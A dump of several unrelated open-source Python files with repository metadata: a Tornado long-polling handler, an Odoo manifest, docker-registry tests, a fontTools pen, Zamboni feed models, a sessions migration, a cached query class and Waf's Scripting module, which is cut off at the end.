for callback in cls.waiters[userid]:
callback(events)
cls.waiters[userid] = []
cls.waiters_lock.release()
class EventsHandler(tornado.web.RequestHandler, UpdatesMixin):
"""Handle HTTP requests sent to <hostname:port>/api endpoint -
namely update and delete events for files."""
def post(self):
#TODO - actually get their userid here
userid = 0
try:
j = self.get_argument("data")
data = json.loads(j)
query = "INSERT INTO events VALUES (NULL,?,?,?,?,?,?,?)"
event = events.Event(0)
for e in data:
event.fromseq(e)
local.database.execute(query, event.totuple()[1:])
e[0] = local.database.lastrowid()
self.updates_ready(userid, data) #send updates to any waiting
#long-polling connections
except:
raise tornado.web.HTTPError(400)
class PollingHandler(tornado.web.RequestHandler, UpdatesMixin):
"""Handle long-polling HTTP requests sent to
<hostname:port>/api/updates/<lastrev> endpoint"""
@tornado.web.asynchronous
def get(self, lastrev):
#TODO - actually get their userid here
userid = 0
#check and see if there are already updates waiting on this user. If
#there are, return them and don't mess with keeping this connection
#around.
logging.info("Update request w/ ip=%s, userid=%s, lastrev=%s" %
(self.request.remote_ip, userid, lastrev))
res = local.database.execute("""SELECT * FROM events WHERE user=? AND
rev > ? ORDER BY rev ASC""", (userid, lastrev))
events = []
for e in res:
events.append(e)
if len(events) > 0:
logging.debug("%s events already available, returning those" %
len(events))
self.on_new_events(events)
else:
logging.debug("No events available, blocking")
self.wait_for_updates(userid, self.async_callback(self.on_new_events))
def on_new_events(self, events):
if self.request.connection.stream.closed():
return
self.write(json.dumps(events))
self.finish()
|
leoliujie/odoo
|
refs/heads/8.0
|
addons/website_crm/__openerp__.py
|
321
|
{
'name': 'Contact Form',
'category': 'Website',
'website': 'https://www.odoo.com/page/website-builder',
'summary': 'Create Leads From Contact Form',
'version': '1.0',
'description': """
OpenERP Contact Form
====================
""",
'author': 'OpenERP SA',
'depends': ['website_partner', 'crm'],
'data': [
'data/website_crm_data.xml',
'views/website_crm.xml',
],
'installable': True,
'auto_install': False,
}
|
nthien/docker-registry
|
refs/heads/master
|
tests/lib/index/test_db.py
|
35
|
import unittest
import mock
from docker_registry.lib.index import db
class TestVersion(unittest.TestCase):
def setUp(self):
self.version = db.Version()
def test_repr(self):
self.assertEqual(type(repr(self.version)), str)
class TestRepository(unittest.TestCase):
def setUp(self):
self.repository = db.Repository()
def test_repr(self):
self.assertEqual(type(repr(self.repository)), str)
class TestSQLAlchemyIndex(unittest.TestCase):
def setUp(self):
self.index = db.SQLAlchemyIndex(database="sqlite://")
@mock.patch('sqlalchemy.engine.Engine.has_table', return_value=True)
@mock.patch('sqlalchemy.orm.query.Query.first')
def test_setup_database(self, first, has_table):
first = mock.Mock( # noqa
side_effect=db.sqlalchemy.exc.OperationalError)
self.assertRaises(
NotImplementedError, db.SQLAlchemyIndex, database="sqlite://")
|
bstell/TachyFont
|
refs/heads/master
|
run_time/src/gae_server/third_party/fonttools/Lib/fontTools/pens/cocoaPen.py
|
14
|
from __future__ import print_function, division, absolute_import
from fontTools.misc.py23 import *
from fontTools.pens.basePen import BasePen
__all__ = ["CocoaPen"]
class CocoaPen(BasePen):
def __init__(self, glyphSet, path=None):
BasePen.__init__(self, glyphSet)
if path is None:
from AppKit import NSBezierPath
path = NSBezierPath.bezierPath()
self.path = path
def _moveTo(self, p):
self.path.moveToPoint_(p)
def _lineTo(self, p):
self.path.lineToPoint_(p)
def _curveToOne(self, p1, p2, p3):
self.path.curveToPoint_controlPoint1_controlPoint2_(p3, p1, p2)
def _closePath(self):
self.path.closePath()
|
mudithkr/zamboni
|
refs/heads/master
|
mkt/feed/models.py
|
7
|
"""
The feed is an assembly of items of different content types.
For ease of querying, each different content type is housed in the FeedItem
model, which also houses metadata indicating the conditions under which it
should be included. So a feed is actually just a listing of FeedItem instances
that match the user's region and carrier.
Current content types able to be attached to FeedItem:
- `FeedApp` (via the `app` field)
- `FeedBrand` (via the `brand` field)
- `FeedCollection` (via the `collection` field)
"""
import os
from django.conf import settings
from django.core.exceptions import ValidationError
from django.db import models
from django.db.models.signals import post_delete
from django.dispatch import receiver
import mkt
import mkt.carriers
import mkt.regions
from mkt.constants.categories import CATEGORY_CHOICES
from mkt.feed import indexers
from mkt.ratings.validators import validate_rating
from mkt.site.decorators import use_master
from mkt.site.fields import ColorField
from mkt.site.models import ManagerBase, ModelBase
from mkt.translations.fields import PurifiedField, TranslatedField, save_signal
from mkt.webapps.models import clean_slug, Preview, Webapp
from mkt.webapps.tasks import index_webapps
from .constants import (BRAND_LAYOUT_CHOICES, BRAND_TYPE_CHOICES,
COLLECTION_TYPE_CHOICES,
FEEDAPP_TYPE_CHOICES)
class BaseFeedCollection(ModelBase):
"""
On the feed, there are a number of types of feed items that share a similar
structure: a slug, one or more member apps with a maintained sort order,
and a number of methods and common views for operating on those apps. This
is a base class for those feed items, including:
- Editorial Brands: `FeedBrand`
- Collections: `FeedCollection`
- Operator Shelves: `FeedShelf`
A series of base classes wraps the common code for these:
- BaseFeedCollection
- BaseFeedCollectionMembership
- BaseFeedCollectionSerializer
- BaseFeedCollectionViewSet
Subclasses of BaseFeedCollection must do a few things:
- Define an M2M field named `_apps` with a custom through model that
inherits from `BaseFeedCollectionMembership`.
- Set the `membership_class` class property to the custom through model
used by `_apps`.
- Set the `membership_relation` class property to the name of the relation
on the model.
"""
_apps = None
slug = models.CharField(blank=True, max_length=30, unique=True,
help_text='Used in collection URLs.')
membership_class = None
membership_relation = None
objects = ManagerBase()
class Meta:
abstract = True
ordering = ('-id',)
def save(self, **kw):
self.clean_slug()
return super(BaseFeedCollection, self).save(**kw)
@use_master
def clean_slug(self):
clean_slug(self, 'slug')
def apps(self):
"""
Public apps on the collection, ordered by their position in the
CollectionMembership model.
Use this method everytime you want to display apps for a collection to
an user.
"""
filters = {
'disabled_by_user': False,
'status': mkt.STATUS_PUBLIC
}
return self._apps.order_by(self.membership_relation).filter(**filters)
def add_app(self, app, order=None):
"""
Add an app to this collection. If specified, the app will be created
with the specified `order`. If not, it will be added to the end of the
collection.
"""
qs = self.membership_class.objects.filter(obj=self)
if order is None:
aggregate = qs.aggregate(models.Max('order'))['order__max']
order = aggregate + 1 if aggregate is not None else 0
rval = self.membership_class.objects.create(obj=self, app=app,
order=order)
index_webapps.delay([app.pk])
return rval
def remove_app(self, app):
"""
Remove the passed app from this collection, returning a boolean
indicating whether a successful deletion took place.
"""
try:
membership = self.membership_class.objects.get(obj=self, app=app)
except self.membership_class.DoesNotExist:
return False
else:
membership.delete()
index_webapps.delay([app.pk])
return True
def remove_apps(self):
"""Remove all apps from collection."""
self.membership_class.objects.filter(obj=self).delete()
def set_apps(self, new_apps):
"""
Passed a list of app IDs, will remove all existing members on the
collection and create new ones for each of the passed apps, in order.
"""
self.remove_apps()
for app_id in new_apps:
self.add_app(Webapp.objects.get(pk=app_id))
index_webapps.delay(new_apps)
class BaseFeedImage(models.Model):
image_hash = models.CharField(default=None, max_length=8, null=True,
blank=True)
class Meta:
abstract = True
class GroupedAppsMixin(object):
"""
An app's membership to a `FeedShelf` class, used as the through model for
`FeedShelf._apps`.
"""
def add_app_grouped(self, app, group, order=None):
"""
Add an app to this collection, as a member of the passed `group`.
If specified, the app will be created with the specified `order`. If
not, it will be added to the end of the collection.
"""
qs = self.membership_class.objects.filter(obj=self)
if order is None:
aggregate = qs.aggregate(models.Max('order'))['order__max']
order = aggregate + 1 if aggregate is not None else 0
rval = self.membership_class.objects.create(obj_id=self.id, app_id=app,
group=group, order=order)
index_webapps.delay([app])
return rval
def set_apps_grouped(self, new_apps):
self.remove_apps()
for group in new_apps:
for app in group['apps']:
self.add_app_grouped(app, group['name'])
class BaseFeedCollectionMembership(ModelBase):
"""
A custom `through` model is required for the M2M field `_apps` on
subclasses of `BaseFeedCollection`. This model houses an `order` field that
maintains the order of apps in the collection. This model serves as an
abstract base class for the custom `through` models.
Subclasses must:
- Define a `ForeignKey` named `obj` that relates the app to the instance
being put on the feed.
"""
app = models.ForeignKey(Webapp)
order = models.SmallIntegerField(null=True)
obj = None
class Meta:
abstract = True
ordering = ('order',)
unique_together = ('obj', 'app',)
class FeedBrandMembership(BaseFeedCollectionMembership):
"""
An app's membership to a `FeedBrand` class, used as the through model for
`FeedBrand._apps`.
"""
obj = models.ForeignKey('FeedBrand')
class Meta(BaseFeedCollectionMembership.Meta):
abstract = False
db_table = 'mkt_feed_brand_membership'
class FeedBrand(BaseFeedCollection):
"""
Model for "Editorial Brands", a special type of collection that allows
editors to quickly create content without involving localizers by choosing
from one of a number of predefined, prelocalized titles.
"""
_apps = models.ManyToManyField(Webapp, through=FeedBrandMembership,
related_name='app_feed_brands')
layout = models.CharField(choices=BRAND_LAYOUT_CHOICES, max_length=30)
type = models.CharField(choices=BRAND_TYPE_CHOICES, max_length=30)
membership_class = FeedBrandMembership
membership_relation = 'feedbrandmembership'
class Meta(BaseFeedCollection.Meta):
abstract = False
db_table = 'mkt_feed_brand'
@classmethod
def get_indexer(self):
return indexers.FeedBrandIndexer
class FeedCollectionMembership(BaseFeedCollectionMembership):
"""
An app's membership to a `FeedCollection` class, used as the through model
for `FeedBrand._apps`.
"""
obj = models.ForeignKey('FeedCollection')
group = PurifiedField(blank=True, null=True)
class Meta(BaseFeedCollectionMembership.Meta):
abstract = False
db_table = 'mkt_feed_collection_membership'
class FeedCollection(GroupedAppsMixin, BaseFeedCollection,
BaseFeedImage):
"""
Model for "Collections", a type of curated collection that allows more
complex grouping of apps than an Editorial Brand.
"""
_apps = models.ManyToManyField(Webapp, through=FeedCollectionMembership,
related_name='app_feed_collections')
color = models.CharField(max_length=20, null=True, blank=True)
name = TranslatedField()
description = PurifiedField(blank=True, null=True)
type = models.CharField(choices=COLLECTION_TYPE_CHOICES, max_length=30,
null=True)
# Deprecated.
background_color = models.CharField(max_length=7, null=True, blank=True)
membership_class = FeedCollectionMembership
membership_relation = 'feedcollectionmembership'
class Meta(BaseFeedCollection.Meta):
abstract = False
db_table = 'mkt_feed_collection'
@classmethod
def get_indexer(self):
return indexers.FeedCollectionIndexer
def image_path(self, suffix=''):
return os.path.join(settings.FEED_COLLECTION_BG_PATH,
str(self.pk / 1000),
'feed_collection{suffix}_{pk}.png'.format(
suffix=suffix, pk=self.pk))
class FeedShelfMembership(BaseFeedCollectionMembership):
"""
An app's membership to a `FeedShelf` class, used as the through model for
`FeedShelf._apps`.
"""
group = PurifiedField(blank=True, null=True)
obj = models.ForeignKey('FeedShelf')
class Meta(BaseFeedCollectionMembership.Meta):
abstract = False
db_table = 'mkt_feed_shelf_membership'
class FeedShelf(GroupedAppsMixin, BaseFeedCollection, BaseFeedImage):
"""
Model for "Operator Shelves", a special type of collection that gives
operators a place to centralize content they wish to feature.
"""
_apps = models.ManyToManyField(Webapp, through=FeedShelfMembership,
related_name='app_shelves')
carrier = models.IntegerField(choices=mkt.carriers.CARRIER_CHOICES)
description = PurifiedField(null=True)
name = TranslatedField()
region = models.PositiveIntegerField(
choices=mkt.regions.REGIONS_CHOICES_ID)
# Shelf landing image.
image_landing_hash = models.CharField(default=None, max_length=8,
null=True, blank=True)
membership_class = FeedShelfMembership
membership_relation = 'feedshelfmembership'
class Meta(BaseFeedCollection.Meta):
abstract = False
db_table = 'mkt_feed_shelf'
@classmethod
def get_indexer(self):
return indexers.FeedShelfIndexer
def image_path(self, suffix=''):
return os.path.join(settings.FEED_SHELF_BG_PATH,
str(self.pk / 1000),
'feed_shelf{suffix}_{pk}.png'.format(
suffix=suffix, pk=self.pk))
@property
def is_published(self):
return self.feeditem_set.exists()
class FeedApp(BaseFeedImage, ModelBase):
"""
Model for "Custom Featured Apps", a feed item highlighting a single app
and some additional metadata (e.g. a review or a screenshot).
"""
app = models.ForeignKey(Webapp)
description = PurifiedField()
slug = models.CharField(max_length=30, unique=True)
color = models.CharField(max_length=20, null=True, blank=True)
type = models.CharField(choices=FEEDAPP_TYPE_CHOICES, max_length=30)
# Optionally linked to a Preview (screenshot or video).
preview = models.ForeignKey(Preview, null=True, blank=True)
# Optionally linked to a pull quote.
pullquote_attribution = models.CharField(max_length=50, null=True,
blank=True)
pullquote_rating = models.PositiveSmallIntegerField(
null=True, blank=True, validators=[validate_rating])
pullquote_text = PurifiedField(null=True)
# Deprecated.
background_color = ColorField(null=True)
class Meta:
db_table = 'mkt_feed_app'
@classmethod
def get_indexer(self):
return indexers.FeedAppIndexer
def clean(self):
"""
Require `pullquote_text` if `pullquote_rating` or
`pullquote_attribution` are set.
"""
if not self.pullquote_text and (self.pullquote_rating or
self.pullquote_attribution):
raise ValidationError('Pullquote text required if rating or '
'attribution is defined.')
super(FeedApp, self).clean()
def image_path(self, suffix=''):
return os.path.join(settings.FEATURED_APP_BG_PATH,
str(self.pk / 1000),
'featured_app{suffix}_{pk}.png'.format(
suffix=suffix, pk=self.pk))
class FeedItem(ModelBase):
"""
A thin wrapper for all items that live on the feed, including metadata
describing the conditions that the feed item should be included in a user's
feed.
"""
category = models.CharField(null=True, blank=True, max_length=30,
choices=CATEGORY_CHOICES)
region = models.PositiveIntegerField(
default=None, null=True, blank=True, db_index=True,
choices=mkt.regions.REGIONS_CHOICES_ID)
carrier = models.IntegerField(default=None, null=True, blank=True,
choices=mkt.carriers.CARRIER_CHOICES,
db_index=True)
order = models.SmallIntegerField(null=True)
item_type = models.CharField(max_length=30)
# Types of objects that may be contained by a feed item.
app = models.ForeignKey(FeedApp, blank=True, null=True)
brand = models.ForeignKey(FeedBrand, blank=True, null=True)
collection = models.ForeignKey(FeedCollection, blank=True, null=True)
shelf = models.ForeignKey(FeedShelf, blank=True, null=True)
class Meta:
db_table = 'mkt_feed_item'
ordering = ('order',)
index_together = (('region', 'carrier'),
('category', 'region', 'carrier'))
@classmethod
def get_indexer(cls):
return indexers.FeedItemIndexer
# Maintain ElasticSearch index.
@receiver(models.signals.post_save, sender=FeedApp,
dispatch_uid='feedapp.search.index')
@receiver(models.signals.post_save, sender=FeedBrand,
dispatch_uid='feedbrand.search.index')
@receiver(models.signals.post_save, sender=FeedCollection,
dispatch_uid='feedcollection.search.index')
@receiver(models.signals.post_save, sender=FeedShelf,
dispatch_uid='feedshelf.search.index')
@receiver(models.signals.post_save, sender=FeedItem,
dispatch_uid='feeditem.search.index')
def update_search_index(sender, instance, **kw):
instance.get_indexer().index_ids([instance.id])
# Delete ElasticSearch index on delete.
@receiver(models.signals.post_delete, sender=FeedApp,
dispatch_uid='feedapp.search.unindex')
@receiver(models.signals.post_delete, sender=FeedBrand,
dispatch_uid='feedbrand.search.unindex')
@receiver(models.signals.post_delete, sender=FeedCollection,
dispatch_uid='feedcollection.search.unindex')
@receiver(models.signals.post_delete, sender=FeedShelf,
dispatch_uid='feedshelf.search.unindex')
@receiver(models.signals.post_delete, sender=FeedItem,
dispatch_uid='feeditem.search.unindex')
def delete_search_index(sender, instance, **kw):
instance.get_indexer().unindex(instance.id)
# Save translations when saving instance with translated fields.
models.signals.pre_save.connect(
save_signal, sender=FeedApp,
dispatch_uid='feedapp_translations')
models.signals.pre_save.connect(
save_signal, sender=FeedCollection,
dispatch_uid='feedcollection_translations')
models.signals.pre_save.connect(
save_signal, sender=FeedCollectionMembership,
dispatch_uid='feedcollectionmembership_translations')
models.signals.pre_save.connect(
save_signal, sender=FeedShelf,
dispatch_uid='feedshelf_translations')
models.signals.pre_save.connect(
save_signal, sender=FeedShelfMembership,
dispatch_uid='feedshelfmembership_translations')
# Delete membership instances when their apps are deleted.
def remove_memberships(*args, **kwargs):
instance = kwargs.get('instance')
for cls in [FeedBrandMembership, FeedCollectionMembership,
FeedShelfMembership]:
cls.objects.filter(app_id=instance.pk).delete()
post_delete.connect(remove_memberships, sender=Webapp, weak=False,
dispatch_uid='cleanup_feed_membership')
|
Outernet-Project/librarian
|
refs/heads/master
|
librarian/core/contrib/sessions/migrations/sessions/01_01_add_sessions_table.py
|
2
|
SQL = """
create table sessions
(
session_id varchar primary key, -- session id
data varchar, -- arbitary session data
expires timestamptz not null -- timestamp when session expires
);
"""
def up(db, conf):
db.executescript(SQL)
|
tsteward/the-blue-alliance
|
refs/heads/master
|
database/database_query.py
|
4
|
import datetime
from google.appengine.api import memcache
from google.appengine.ext import ndb
import logging
from models.cached_query_result import CachedQueryResult
import random
import tba_config
MEMCACHE_CLIENT = memcache.Client()
class DatabaseQuery(object):
DATABASE_QUERY_VERSION = 2
DATABASE_HITS_MEMCACHE_KEYS = ['database_query_hits_{}:{}'.format(i, DATABASE_QUERY_VERSION) for i in range(25)]
DATABASE_MISSES_MEMCACHE_KEYS = ['database_query_misses_{}:{}'.format(i, DATABASE_QUERY_VERSION) for i in range(25)]
BASE_CACHE_KEY_FORMAT = "{}:{}:{}" # (partial_cache_key, cache_version, database_query_version)
VALID_DICT_VERSIONS = {3}
DICT_CONVERTER = None
def __init__(self, *args):
self._query_args = args
@property
def cache_key(self):
if not hasattr(self, '_cache_key'):
self._cache_key = self.BASE_CACHE_KEY_FORMAT.format(
self.CACHE_KEY_FORMAT.format(*self._query_args),
self.CACHE_VERSION,
self.DATABASE_QUERY_VERSION)
return self._cache_key
@classmethod
def delete_cache_multi(cls, cache_keys):
all_cache_keys = []
for cache_key in cache_keys:
all_cache_keys.append(cache_key)
if cls.DICT_CONVERTER is not None:
all_cache_keys += [cls._dict_cache_key(cache_key, valid_dict_version) for valid_dict_version in cls.VALID_DICT_VERSIONS]
logging.info("Deleting db query cache keys: {}".format(all_cache_keys))
ndb.delete_multi([ndb.Key(CachedQueryResult, cache_key) for cache_key in all_cache_keys])
@classmethod
def _dict_cache_key(cls, cache_key, dict_version):
return '{}~dictv{}.{}'.format(cache_key, dict_version, cls.DICT_CONVERTER.SUBVERSIONS[dict_version])
def fetch(self, dict_version=None, return_updated=False):
return self.fetch_async(
dict_version=dict_version,
return_updated=return_updated).get_result()
@ndb.tasklet
def fetch_async(self, dict_version=None, return_updated=False):
if dict_version:
if dict_version not in self.VALID_DICT_VERSIONS:
raise Exception("Bad api version for database query: {}".format(dict_version))
cache_key = self._dict_cache_key(self.cache_key, dict_version)
else:
cache_key = self.cache_key
cached_query = yield CachedQueryResult.get_by_id_async(cache_key)
do_stats = random.random() < tba_config.RECORD_FRACTION
rpcs = []
if cached_query is None:
if do_stats:
rpcs.append(MEMCACHE_CLIENT.incr_async(
random.choice(self.DATABASE_MISSES_MEMCACHE_KEYS),
initial_value=0))
query_result = yield self._query_async()
if dict_version:
query_result = self.DICT_CONVERTER.convert(query_result, dict_version)
if tba_config.CONFIG['database_query_cache']:
if dict_version:
rpcs.append(CachedQueryResult(
id=cache_key,
result_dict=query_result,
).put_async())
else:
rpcs.append(CachedQueryResult(
id=cache_key,
result=query_result,
).put_async())
updated = datetime.datetime.now()
else:
if do_stats:
rpcs.append(MEMCACHE_CLIENT.incr_async(
random.choice(self.DATABASE_HITS_MEMCACHE_KEYS),
initial_value=0))
if dict_version:
query_result = cached_query.result_dict
else:
query_result = cached_query.result
updated = cached_query.updated
for rpc in rpcs:
try:
rpc.get_result()
except Exception, e:
logging.warning("An RPC in DatabaseQuery.fetch_async() failed!")
if return_updated:
raise ndb.Return((query_result, updated))
else:
raise ndb.Return(query_result)
|
engla/kupfer
|
refs/heads/master
|
waflib/Scripting.py
|
5
|
#!/usr/bin/env python
# encoding: utf-8
# Thomas Nagy, 2005-2010 (ita)
"Module called for configuring, compiling and installing targets"
import os, shutil, traceback, errno, sys, stat
from waflib import Utils, Configure, Logs, Options, ConfigSet, Context, Errors, Build, Node
build_dir_override = None
no_climb_commands = ['configure']
default_cmd = "build"
def waf_entry_point(current_directory, version, wafdir):
"""
This is the main entry point, all Waf execution starts here.
:param current_directory: absolute path representing the current directory
:type current_directory: string
:param version: version number
:type version: string
:param wafdir: absolute path representing the directory of the waf library
:type wafdir: string
"""
Logs.init_log()
if Context.WAFVERSION != version:
Logs.error('Waf script %r and library %r do not match (directory %r)' % (version, Context.WAFVERSION, wafdir))
sys.exit(1)
if '--version' in sys.argv:
Context.run_dir = current_directory
ctx = Context.create_context('options')
ctx.curdir = current_directory
ctx.parse_args()
sys.exit(0)
Context.waf_dir = wafdir
Context.launch_dir = current_directory
# if 'configure' is in the commands, do not search any further
no_climb = os.environ.get('NOCLIMB', None)
if not no_climb:
for k in no_climb_commands:
if k in sys.argv:
no_climb = True
break
# try to find a lock file (if the project was configured)
# at the same time, store the first wscript file seen
cur = current_directory
while cur:
lst = os.listdir(cur)
if Options.lockfile in lst:
env = ConfigSet.ConfigSet()
try:
env.load(os.path.join(cur, Options.lockfile))
ino = os.stat(cur)[stat.ST_INO]
except Exception:
pass
else:
# check if the folder was not moved
for x in [env.run_dir, env.top_dir, env.out_dir]:
if Utils.is_win32:
if cur == x:
load = True
break
else:
# if the filesystem features symlinks, compare the inode numbers
try:
ino2 = os.stat(x)[stat.ST_INO]
except:
pass
else:
if ino == ino2:
load = True
break
else:
Logs.warn('invalid lock file in %s' % cur)
load = False
if load:
Context.run_dir = env.run_dir
Context.top_dir = env.top_dir
Context.out_dir = env.out_dir
break
if not Context.run_dir:
if Context.WSCRIPT_FILE in lst:
Context.run_dir = cur
next = os.path.dirname(cur)
if next == cur:
break
cur = next
if no_climb:
break
if not Context.run_dir:
if '-h' in sys.argv or '--help' in sys.argv:
Logs.warn('No wscript file found: the help message may be incomplete')
Context.run_dir = current_directory
ctx = Context.create_context('options')
ctx.curdir = current_directory
ctx.parse_args()
sys.exit(0)
Logs.error('Waf: Run from a directory containing a file named %r' % Context.WSCRIPT_FILE)
sys.exit(1)
try:
os.chdir(Context.run_dir)
except OSError:
Logs.error('Waf: The folder %r is unreadable' % Context.run_dir)
sys.exit(1)
try:
set_main_module(Context.run_dir + os.sep + Context.WSCRIPT_FILE)
except Errors.WafError as e:
Logs.pprint('RED', e.verbose_msg)
Logs.error(str(e))
sys.exit(1)
except Exception as e:
Logs.error('Waf: The wscript in %r is unreadable' % Context.run_dir, e)
traceback.print_exc(file=sys.stdout)
sys.exit(2)
"""
import cProfile, pstats
cProfile.runctx("import Scripting; Scripting.run_commands()", {}, {}, 'profi.txt')
p = pstats.Stats('profi.txt')
p.sort_stats('time').print_stats(25)
"""
try:
run_commands()
except Errors.WafError as e:
if Logs.verbose > 1:
Logs.pprint('RED', e.verbose_msg)
Logs.error(e.msg)
sys.exit(1)
except Exception as e:
traceback.print_exc(file=sys.stdout)
sys.exit(2)
except KeyboardInterrupt:
Logs.pprint('RED', 'Interrupted')
sys.exit(68)
#"""
def set_main_module(file_path):
"""
Read the main wscript file into :py:const:`waflib.Context.Context.g_module` and
bind default functions such as ``init``, ``dist``, ``distclean`` if not defined.
Called by :py:func:`waflib.Scripting.waf_entry_point` during the initialization.
:param file_path: absolute path representing the top-level wscript file
:type file_path: string
"""
Context.g_module = Context.load_module(file_path)
Context.g_module.root_path = file_path
# note: to register the module globally, use the following:
# sys.modules['wscript_main'] = g_module
def set_def(obj):
name = obj.__name__
if not name in Context.g_module.__dict__:
setattr(Context.g_module, name, obj)
for k in [update, dist, distclean, distcheck, update]:
set_def(k)
# add dummy init and shutdown functions if they're not defined
if not 'init' in Context.g_module.__dict__:
Context.g_module.init = Utils.nada
if not 'shutdown' in Context.g_module.__dict__:
Context.g_module.shutdown = Utils.nada
if not 'options' in Context.g_module.__dict__:
Context.g_module.options = Utils.nada
def parse_options():
"""
Parse the command-line options and initialize the logging system.
Called by :py:func:`waflib.Scripting.waf_entry_point` during the initialization.
"""
Context.create_context('options').execute()
if not Options.commands:
Options.commands = [default_cmd]
Options.commands = [x for x in Options.commands if x != 'options'] # issue 1076
# process some internal Waf options
Logs.verbose = Options.options.verbose
Logs.init_log()
if Options.options.zones:
Logs.zones = Options.options.zones.split(',')
if not Logs.verbose:
Logs.verbose = 1
elif Logs.verbose > 0:
Logs.zones = ['runner']
if Logs.verbose > 2:
Logs.zones = ['*']
def run_command(cmd_name):
"""
Execute a single command. Called by :py:func:`waflib.Scripting.run_commands`.
:param cmd_name: command to execute, like ``build``
:type cmd_name: string
"""
ctx = Context.create_context(cmd_name)
ctx.options = Options.options # provided for convenience
ctx.cmd = cmd_name
ctx.execute()
return ctx
def run_commands():
"""
Execute the commands that were given on the command-line, and the other options
Called by :py:func:`waflib.Scripting.waf_entry_point` during the initialization, and executed
after :py:func:`waflib.Scripting.parse_options`.
"""
parse_options()
run_command('init')
while Options.commands:
cmd_name = Options.commands.pop(0)
timer = Utils.Timer()
run_command(cmd_name)
if not Options.options.progress_bar:
elapsed = ' (%s)' % str(timer)
Logs.info('%r finished successfully%s' % (cmd_name, elapsed))
run_command('shutdown')
###########################################################################################
def _can_distclean(name):
# WARNING: this method may disappear anytime
for k in '.o .moc .exe'.split():
if name.endswith(k):
return True
return False
def distclean_dir(dirname):
"""
Distclean function called in the particular case when::
top == out
:param dirname: absolute path of the folder to clean
:type dirname: string
"""
for (root, dirs, files) in os.walk(dirname):
for f in files:
if _can_distclean(f):
fname = root + os.sep + f
try:
os.unlink(fname)
except:
Logs.warn('could not remove %r' % fname)
for x in [Context.DBFILE, 'config.log']:
try:
os.unlink(x)
except:
pass
try:
shutil.rmtree('c4che')
except:
pass
def distclean(ctx):
'''removes the build directory'''
lst = os.listdir('.')
for f in lst:
if f == Options.lockfile:
try:
proj = ConfigSet.ConfigSet(f)
except:
Logs.warn('could not read %r' % f)
continue
if proj['out_dir'] != proj['top_dir']:
try:
shutil.rmtree(proj['out_dir'])
except IOError:
pass
except OSError as e:
if e.errno != errno.ENOENT:
Logs.warn('project %r cannot be removed' % proj[Context.OUT])
else:
distclean_dir(proj['out_dir'])
for k in (proj['out_dir'], proj['top_dir'], proj['run_dir']):
try:
os.remove(os.path.join(k, Options.lockfile))
except OSError as e:
if e.errno != errno.ENOENT:
Logs.warn('file %r cannot be removed' % f)
# remove the local waf cache
if f.startswith('.waf') and not Options.commands:
shutil.rmtree(f, ignore_errors=True)
class Dist(Context.Context):
"""
Create an archive containing the project source code::
$ waf dist
"""
cmd = 'dist'
fun = 'dist'
algo = 'tar.bz2'
ext_algo = {}
def execute(self):
"""
See :py:func:`waflib.Context.Context.execute`
"""
self.recurse([os.path.dirname(Context.g_module.root_path)])
self.archive()
def archive(self):
"""
Create the archive.
"""
import tarfile
arch_name = self.get_arch_name()
try:
self.base_path
except:
self.base_path = self.path
node = self.base_path.make_node(arch_name)
try:
node.delete()
except:
pass
files = self.get_files()
if self.algo.startswith('tar.'):
tar = tarfile.open(arch_name, 'w:' + self.algo.replace('tar.', ''))
for x in files:
self.add_tar_file(x, tar)
tar.close()
elif self.algo == 'zip':
import zipfile
zip = zipfile.ZipFile(arch_name, 'w', compression=zipfile.ZIP_DEFLATED)
for x in files:
archive_name = self.get_base_name() + '/' + x.path_from(self.base_path)
zip.write(x.abspath(), archive_name, zipfile.ZIP_DEFLATED)
zip.close()
else:
self.fatal('Valid algo types are tar.bz2, tar.gz or zip')
try:
from hashlib import sha1 as sha
except ImportError:
from sha import sha
try:
digest = " (sha=%r)" % sha(node.read()).hexdigest()
except:
digest = ''
Logs.info('New archive created: %s%s' % (self.arch_name, digest))
def get_tar_path(self, node):
"""
return the path to use for a node in the tar archive, the purpose of this
is to let subclases resolve symbolic links or to change file names
"""
return node.abspath()
def add_tar_file(self, x, tar):
"""
Add a file to the tar archive. Transform symlinks into files if the files lie out of the project tree.
"""
p = self.get_tar_path(x)
tinfo = tar.gettarinfo(name=p, arcname=self.get_tar_prefix() + '/' + x.path_from(self.base_path))
tinfo.uid = 0
tinfo.gid = 0
tinfo.uname = 'root'
tinfo.gname = 'root'
fu = None
try:
fu = open(p, 'rb')
tar.addfile(tinfo, fileobj=fu)
finally:
if fu:
fu.close()
def get_tar_prefix(self):
try:
return self.tar_prefix
except:
return self.get_base_name()
def get_arch_name(self):
"""
Return the name of the archive to create. Change the default value by setting *arch_name*::
def dist(ctx):
ctx.arch_name = 'ctx.tar.bz2'
:rtype: string
"""
try:
self.arch_name
except:
self.arch_name = self.get_base_name() + '.' + self.ext_algo.get(self.algo, self.algo)
return self.arch_name
def get_base_name(self):
"""
Return the default name of the main directory in the archive, which is set to *appname-version*.
Set the attribute *base_name* to change the default value::
def dist(ctx):
ctx.base_name = 'files'
:rtype: string
"""
try:
self.base_name
except:
appname = getattr(Context.g_module, Context.APPNAME, 'noname')
version = getattr(Context.g_module, Context.VERSION, '1.0')
self.base_name = appname + '-' + version
return self.base_name
def get_excl(self):
"""
Return the patterns to exclude for finding the files in the top-level directory. Set the attribute *excl*
to change the default value::
def dist(ctx):
ctx.excl = 'build **/*.o **/*.class'
:rtype: string
"""
try:
return self.excl
except:
self.excl = Node.exclude_regs + ' **/waf-1.6.* **/.waf-1.6* **/waf3-1.6.* **/.waf3-1.6* **/*~ **/*.rej **/*.orig **/*.pyc **/*.pyo **/*.bak **/*.swp **/.lock-w*'
nd = self.root.find_node(Context.out_dir)
if nd:
self.excl += ' ' + nd.path_from(self.base_path)
return self.excl
def get_files(self):
"""
The files to package are searched automatically by :py:func:`waflib.Node.Node.ant_glob`. Set
*files* to prevent this behaviour::
def dist(ctx):
ctx.files = ctx.path.find_node('wscript')
The files are searched from the directory 'base_path', to change it, set::
def dist(ctx):
ctx.base_path = path
:rtype: list of :py:class:`waflib.Node.Node`
"""
try:
files = self.files
except:
files = self.base_path.ant_glob('**/*', excl=self.get_excl())
return files
def dist(ctx):
'''makes a tarball for redistributing the sources'''
pass
class DistCheck(Dist):
"""
Create an archive of the project, and try to build the project in a temporary directory::
$ waf distcheck
"""
fun = 'distcheck'
cmd = 'distcheck'
def execute(self):
"""
See :py:func:`waflib.Context.Context.execute`
"""
self.recurse([os.path.dirname(Context.g_module.root_path)])
self.archive()
self.check()
def check(self):
"""
Create the archive, uncompress it and try to build the project
"""
import tempfile, tarfile
t = None
try:
t = tarfile.open(self.get_arch_name())
